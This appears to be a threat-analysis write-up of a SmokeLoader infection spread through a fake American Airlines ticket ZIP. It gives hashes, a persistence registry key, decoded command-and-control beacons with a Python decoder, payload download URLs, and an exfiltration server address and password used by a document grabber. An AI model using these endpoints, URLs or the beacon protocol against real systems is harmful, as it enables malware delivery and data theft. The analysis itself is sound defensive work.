American Airlines Ticket Attachment

Subject: Order#4532104
Attachment: Ticket_American_Airlines_ID3457-144.zip

American Airlines

The sample contained a SmokeLoader payload within the attachment. It had the following properties:

File: Ticket_American_Airlines_ID3457-144.exe
MD5: 0b2b79189fd6e04a644c647cbebdd757
Size: 1,35,168 bytes
Path: C:\Documents and Settings\nightrover\Application Data\DD8F30.exe

The following registry key is created to ensure the file starts with each system reboot:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Windows
“C:\Documents and Settings\nightrover\Application Data\DD8F30.exe”

The following network traffic is observed, related to Smoke Loader (all “smk=” values can be decoded by Base64-decoding them and then XORing each byte with 0x02):

  • Google.com

Likely a connectivity test.

  • POST ofalaskas14[.]ru/wen/index.php

The infected host POSTs the following to the server:
cmd=grab&data=&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZycG16ew==’, which decodes to ‘.cmd=getproxy’.
This downloads encoded data, likely the SOCKS proxy module that is available as an add-on for Smoke Loader.

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9EQTtBNkZEMjM0MUYwOkc6MkMzRzFENTo2MDY2NjBBQTAxRkY6RDEyJHJtcHY/MTE0NjA=’, which decodes to
‘.cmd=getsocks&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30&port=33642’.
This likely indicates the SOCKS proxy port.

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbGNuP21p’, which decodes to
‘.cmd=getload&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30&sel=19mar&ver=5.1&bits=0&final=ok’.
The server returns ‘Smk6’, which indicates that there are 6 files to download.

  • POST tropic18854[.]ru/ddn/index.php

Data posted is ‘AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbmc/cA==’, which decodes to
‘.cmd=getload&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30&sel=19mar&ver=5.1&bits=0&file=r’.
The server redirects to the first file to be downloaded via a Location header. This is repeated for each of the 6 files, with the file= parameter incrementing for each download.
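The decoding rule described above (Base64, then XOR each byte with 0x02) is easy to script so that captured beacon bodies can be turned back into their cmd/login/port fields for detection and triage. The following is an added example written for this post, not the malware's or the original author's code; the sample bodies are the ones quoted above, and the leading NUL byte that the XOR produces (rendered as ‘.’ above) is stripped before parsing.

```python
import base64

# Observed in the traffic above: plaintext is XORed with 0x02, then Base64-encoded.
SMK_XOR_KEY = 0x02


def decode_smk(value: str) -> bytes:
    """Decode one Smoke Loader beacon body.

    Accepts either the full "smk=<base64>" form or the bare Base64 value
    (the tropic18854[.]ru beacon above was posted without the smk= prefix).
    """
    if value.startswith("smk="):
        value = value[len("smk="):]
    raw = base64.b64decode(value)
    return bytes(b ^ SMK_XOR_KEY for b in raw)


def parse_beacon(value: str) -> dict:
    """Decode a beacon and split it into key=value fields.

    The first plaintext byte is 0x02 ^ 0x02 == 0x00; it carries no field
    data, so it is dropped before splitting on '&'.
    """
    plain = decode_smk(value).lstrip(b"\x00").decode("ascii")
    fields = {}
    for part in plain.split("&"):
        key, _, val = part.partition("=")
        fields[key] = val
    return fields


# Beacon bodies quoted in the analysis above (getproxy, getsocks, getload).
SAMPLES = [
    "smk=AmFvZj9lZ3ZycG16ew==",
    "smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9EQTtBNkZEMjM0MUYwOkc6MkMzRzFENTo2MDY2NjBBQTAxRkY6RDEyJHJtcHY/MTE0NjA=",
    "smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbGNuP21p",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(parse_beacon(sample))
```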

One of the files SmokeLoader downloads is an Office document grabber. During our analysis we observed it searching for all Office documents, archiving them as a ZIP file and uploading that archive to the server shown below:

It then uploads an archive made of all the .XLS and .DOC files collected from the victim machine to

91.201.4.62:8000 – filename=tcrlsgun.zip – group_id=1486090109 – password=nohifoaa

The following files were downloaded:

http://www.theoldpalmerhouse[.]com/orderspro/template/images/1.exe
http://www.wgohwugo[.]com/images/obits/_vti_cnf/1.exe

MD5: e7501c4a9d19135a6d6f357216289324
Size: 4,09,600 bytes
AV detection indicates that it is likely a rogue AV variant.

http://www.wgohwugo[.]com/images/obits/_vti_cnf/pod.exe

MD5: 864f1cf79e92631168797a7ed8cb7c99
Size: 6,31,808 bytes
AV detection indicates that it is likely a downloader/backdoor.

Observed network communications include the following:

  • report.31q93ce93k7ywsk931.com /?s5e55k=%96%9B%A1%D0%D6%AA%91%94c%A4m%96%C8%C6kf%A2%98%AA%DA%AC%CFkjac%94%A8%A5%AC%99%9Df%5B%E2%E8%A2%E7%E5%CA%C4T%A8%9A%D5vf%95%9BjY%D7%A5%E0%B4%D8%D9f%88%84T%D0%D8%D1%B0v%9Dmx%9F%A8%AA%A1%B3%A2%BAtge%B4ny%99%A7%7Dk%A1%7B%B2%AC%B8%9Fjhuo%9A%95%DF%D8%A8%A2ee%9B%A2%95%A3%A0%A2%A4%5Ecb%A1ic%93%95ic%9B%5D%EF%B4%A3%9Bica%5E%9B%A6%91
  • report.iq931o9oc7931g9i.com/?3s7931y=%96%9B%A1%D0%D6%AA%91%CA%A3lg%94%D4%9A%A1%96n%9Ad%94%A0%9D%9Be%93%A4%9El%ABp%9Dkb%9F%E9%DB%AD%E6%E8%CC~%8F%E6%A2%97n%A2k%A5%94%5D%A5%A1%98%A4%9E%D7%5B%B8%C2%93%A0%DC%9Bvti%B1%B5%99%A6%B4%A3%B8%5E%AF%B7mgt%A4%7F%A5%A5%7Bqiu%A0n%AEb%94%A4%B1t%AA%5D%AB%98%A4%B6%A3%95%A0%9F%A2%A6%5E%99%A1icb%9Fi%9F%93gica%8D%AF%A6%5E%93%9F%9Dc%A3opW

Both these requests resulted in 301 Moved Permanently – Location: hxxp://www.bing.com/
